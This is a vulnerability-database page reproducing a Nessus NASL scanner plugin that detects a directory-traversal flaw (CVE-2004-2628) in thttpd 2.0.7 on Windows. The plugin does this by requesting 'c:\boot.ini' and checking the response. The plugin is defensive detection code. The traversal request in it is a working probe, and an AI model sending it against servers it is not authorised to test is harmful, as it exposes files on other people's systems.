Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2004-2020 Tenable Network Security, Inc.THTTPD_DIRECTORY_TRAVERSAL.NASL
HistoryAug 09, 2004 - 12:00 a.m.

thttpd 2.0.7 Directory Traversal (Windows)

2004-08-0900:00:00
This script is Copyright (C) 2004-2020 Tenable Network Security, Inc.
www.tenable.com
53
JSON

The remote web server fails to limit requests to items within the document directory. An attacker may exploit this flaw to read arbitrary files on the remote system with the privileges of the http process.

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
 script_id(14229);
 script_version("1.23");

 script_cve_id("CVE-2004-2628");
 script_bugtraq_id(10862);
 
 script_name(english:"thttpd 2.0.7 Directory Traversal (Windows)");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server is vulnerable to a path traversal attack." );
 script_set_attribute(attribute:"description", value:
"The remote web server fails to limit requests to items within the
document directory.  An attacker may exploit this flaw to read
arbitrary files on the remote system with the privileges of the http
process." );
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2004/Aug/144");
 script_set_attribute(attribute:"solution", value:
"Unknown at this time." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2004/08/09");
 script_set_attribute(attribute:"vuln_publication_date", value: "2004/08/04");
 script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

 
 script_summary(english:"thttpd traversal - try to read c:\boot.ini");
 
 script_category(ACT_GATHER_INFO);
 
 script_copyright(english:"This script is Copyright (C) 2004-2020 Tenable Network Security, Inc.");
 script_family(english:"Web Servers");
 script_dependencie("http_version.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#

include("http_func.inc");

port = get_http_port(default:80, embedded:TRUE);

if(get_port_state(port))
{
 soc = http_open_socket(port);
 if(soc)
 {
  buf = http_get(item:"c:\boot.ini", port:port);
  send(socket:soc, data:buf);
  rep = http_recv(socket:soc);
  if ( '\r\n\r\n' >< rep )
   rep = strstr(rep, '\r\n\r\n');

  if(egrep(pattern:"\[boot loader\]", string:rep))
  {
    report = string(
      "\n",
      "Requesting the file c:\\boot.ini returns :\n",
      "\n",
      rep, "\n"
    );
    security_warning(port:port, extra:report);
  }

  http_close_socket(soc);
 }
}

Related

cve 1
openvas 1
cvelist 1
cve
cve
CVE-2004-2628
2004-12-31 05:00:00
openvas
openvas
thttpd Directory Traversal Vulnerability (CVE-2004-2628) - Windows
2005-11-03 00:00:00
cvelist
cvelist
CVE-2004-2628
2005-12-04 22:00:00
JSON
Related for THTTPD_DIRECTORY_TRAVERSAL.NASL
cve1openvas1cvelist1